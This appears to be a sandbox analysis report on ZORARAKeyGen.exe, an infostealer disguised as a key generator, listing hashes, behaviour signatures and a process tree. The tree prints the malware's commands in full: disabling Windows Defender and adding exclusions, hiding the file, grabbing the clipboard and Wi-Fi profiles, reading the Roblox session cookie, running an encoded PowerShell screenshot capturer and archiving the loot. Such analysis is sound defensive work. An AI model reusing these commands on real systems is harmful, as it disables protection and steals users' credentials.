Analysis

  • max time kernel
    139s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 02:46

General

  • Target

    ZORARAKeyGen.exe

  • Size

    7.5MB

  • MD5

    e38932123a595819ab3e191b0ee5c121

  • SHA1

    a7fc575b31ad13a52be5dbd59857116472da38da

  • SHA256

    eec647abba9d0594e0f3ba261c7473f633f8f4af119d59faf387e847d3bd789b

  • SHA512

    3ced6fb1dc3f5b3a15384c1e3accb40aca440665b7f1411beee8f0df7f5ec837ba63b9892429b41e8b996e18f3c4bda88b959a55bbfcb8e4be35de64f3136b42

  • SSDEEP

    196608:8XWEzvLjv+bhqNVoB8Ck5c7GpNlpq41J2vbk9qtl8f8jS/:EWgL+9qz88Ck+7q3p91J3dfES/

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe
    "C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4904
    • C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe
      "C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:264
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4512
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:996
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System down, updating in a few minutes.', 0, 'Error!', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1628
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System down, updating in a few minutes.', 0, 'Error!', 48+16);close()"
          4⤵
            PID:2348
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe""
          3⤵
          • Hide Artifacts: Hidden Files and Directories
          • Suspicious use of WriteProcessMemory
          PID:4580
          • C:\Windows\system32\attrib.exe
            attrib +h +s "C:\Users\Admin\AppData\Local\Temp\ZORARAKeyGen.exe"
            4⤵
            • Views/modifies file attributes
            PID:1252
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2692
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2844
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3376
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4032
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3996
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1516
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4092
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3012
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:60
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:660
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2424
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3956
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:1900
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:1056
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4544
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3948
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:5056
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5024
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              4⤵
                PID:1604
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4316
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4932
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rdnkxnhv\rdnkxnhv.cmdline"
                  5⤵
                    PID:2156
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5F2.tmp" "c:\Users\Admin\AppData\Local\Temp\rdnkxnhv\CSCAECA6561C90444C3BEF35439B7215F.TMP"
                      6⤵
                        PID:2036
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3156
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2772
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                      3⤵
                        PID:3084
                        • C:\Windows\system32\attrib.exe
                          attrib -r C:\Windows\System32\drivers\etc\hosts
                          4⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:4004
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:2260
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:4680
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                            3⤵
                              PID:2464
                              • C:\Windows\system32\attrib.exe
                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                4⤵
                                • Drops file in Drivers directory
                                • Views/modifies file attributes
                                PID:3308
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:4248
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:2252
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  3⤵
                                    PID:2812
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist /FO LIST
                                      4⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1968
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:3004
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:4584
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:4436
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:1372
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:5012
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4004
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              3⤵
                                                PID:1504
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5108
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                3⤵
                                                  PID:3308
                                                  • C:\Windows\system32\getmac.exe
                                                    getmac
                                                    4⤵
                                                      PID:4872
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49042\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\BgKak.zip" *"
                                                    3⤵
                                                      PID:3700
                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\rar.exe
                                                        C:\Users\Admin\AppData\Local\Temp\_MEI49042\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\BgKak.zip" *
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:1456
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      3⤵
                                                        PID:1580
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic os get Caption
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2464
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                        3⤵
                                                          PID:4104
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic computersystem get totalphysicalmemory
                                                            4⤵
                                                              PID:1572
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            3⤵
                                                              PID:3996
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                4⤵
                                                                  PID:876
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                3⤵
                                                                  PID:3724
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4464
